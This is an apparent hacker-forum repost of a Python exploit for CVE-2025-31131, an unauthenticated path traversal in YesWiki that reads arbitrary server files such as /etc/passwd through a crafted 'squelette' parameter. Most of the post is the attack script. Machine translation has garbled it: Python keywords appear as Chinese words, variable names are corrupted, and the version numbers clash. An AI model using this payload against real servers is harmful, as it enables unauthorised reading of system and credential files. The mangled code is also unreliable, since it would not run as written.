H

Yeswiki 4.5.1-未经身份验证的路径遍历

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: Yeswiki 4.5.2-未经身份验证的路径遍历
#利用作者: Al Baradi Joy
#利用日期: 2025年4月6日
#CVE ID: CVE-2025-31131
#供应商homepage: https://yeswiki.net/
#软件link: https://github.com/yeswiki/yeswiki
#受影响的版本: 4.5.2
#在Ubuntu上测试了: Yeswiki 4.5.1 22.04
#脆弱性type:未经验证的路径遍历(LFI)
#CVSS得分: 8.6(高)
#CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:C/C33:H/I3:N
#Description:
#版本4.5.2之前的YesWiki很容易受到未经身份验证的路径的影响
遍历“ Squelette”参数。
#远程攻击者可以利用此问题来读取任意文件
服务器,例如/etc /passwd。
导入请求
导入系统
def Banner():
打印('=' * 80)
print('Yeswiki 4.5.2-未经身份验证的路径遍历
(CVE-2025-31131)')
打印('剥削作者: al baradi joy')
打印('=' * 80)
def exploit(target,filename='/etc/passwd'):
如果不是target.startswith('http'):
target='http://' +目标
traversal='./' * 8
encoded_file=filename.replace('/','%2F')
有效载荷=
f'/?urkceo/edittheme=margotsquelette={traversal} {encoded_file} style=margot.css'
url=target.rstrip('/') +有效载荷
TRY:
打印(f'[+] target: {target}')
打印(f'[+]试图读取: {filename}')
响应=requests.get(url,超时=10)
if antys.status_code==200和``root:'in wenspy.text:''
打印('[+]利用成功。文件内容: \ n')
打印(响应。文本)
其他:
打印('[!]利用失败或文件不可读取。')
打印(f'status code: {response.status_code}')
如果Len(wendesp.text)200:
print(f'Response: \ n {response.text}')
除了requests.exceptions.requestexception为e:
打印(f'[!]请求失败: {e}')
如果name=='__ -Main __':
横幅()
如果Len(sys.argv)2:
print(f'usage: python3 {sys.argv [0]} target_url [file_to_read])
打印(f'example: python3 {sys.argv [0]} http://victim.com
/etc/passwd')
sys.exit(1)
target_url=sys.argv [1]
file_to_read=sys.argv [2]如果len(sys.argv)2 else'/etc/passwd'
exploit(target_url,file_to_read)
 
后退
顶部